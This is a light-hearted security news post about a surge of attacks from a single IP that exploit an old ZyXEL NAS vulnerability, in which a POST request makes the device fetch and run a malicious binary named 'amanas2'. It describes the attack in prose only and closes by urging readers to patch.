Cyber Sleuths Beware: Rising Attacks on Old NAS Vulnerabilities Uncovered

Hot Take:

Just when you thought your digital storage was safe, along comes another network-attached storage (NAS) vulnerability exploit to keep cybersecurity teams on their toes. NAS devices are becoming the new playground for cybercriminals, proving yet again that no cookie (or NAS) jar is safe from their sticky fingers.

• A newly discovered exploit targets a known vulnerability in ZyXEL NAS devices, attempting to download and execute malicious binaries.
• The attack vector involves a POST request tricking the NAS into downloading a binary named “amanas2” from a suspicious IP.
• Surge in exploit activity noted over a span of four days, indicating a targeted attack from a single IP address.
• Despite the age of the vulnerability, the exploit has only recently been observed in the wild, suggesting delayed exploitation tactics.
• Links to virus total analysis and original vulnerability disclosure provide further insights into the threat landscape.

Need to know more?

Attack Patterns on the Rise

It seems our cyber adversaries have a calendar marked with “NAS Attack Week.” The recent logs reveal a sudden spike in attacks targeting a specific vulnerability in ZyXEL NAS devices. Imagine this as your annoying neighbor deciding to crank up the music just when you thought it was safe to relax. This exploit’s party trick? A POST request that would make any NAS weep binary tears.

A Binary Bash

The crux of this exploit revolves around a rather cheeky binary named “amanas2.” The attackers, who apparently don’t believe in subtlety, have the NAS devices download and execute this binary from a rather dubious online location. Sadly, the digital detectives couldn’t snag the file for a closer look because, much like a bad magic trick, the binary vanished before it could be examined. However, a tip of the hat to VirusTotal, which confirmed the file’s malevolent nature.

The Lone Ranger of IPs

In a plot twist worthy of a cyber-thriller, all attacks originated from a single IP address. This lone cyber cowboy rode into the digital town a few days before the attacks began, scouting the landscape and likely sizing up the local digital saloon (a.k.a. the NAS devices). The logs show a meticulous buildup to the main event, hinting at a calculated assault rather than random skirmishes.

A Delayed Discovery

What’s fascinating here is the timing. The vulnerabilities were disclosed last year, yet it took almost a year for them to be exploited. This isn’t your run-of-the-mill “exploit the day after disclosure” scenario. No, this is more like aging a fine wine, where the cybercriminals waited patiently for the perfect moment to uncork their malicious plans. A reminder that in cybersecurity, old vulnerabilities never truly die; they just wait in the shadows.

What’s Next?

As always, staying ahead of these threats requires vigilance and patching old vulnerabilities. It’s a game of digital cat and mouse, and right now, the mice are getting pretty clever. So, keep those NAS devices patched, folks, or you might find they’re joining a conga line you never intended them to be part of!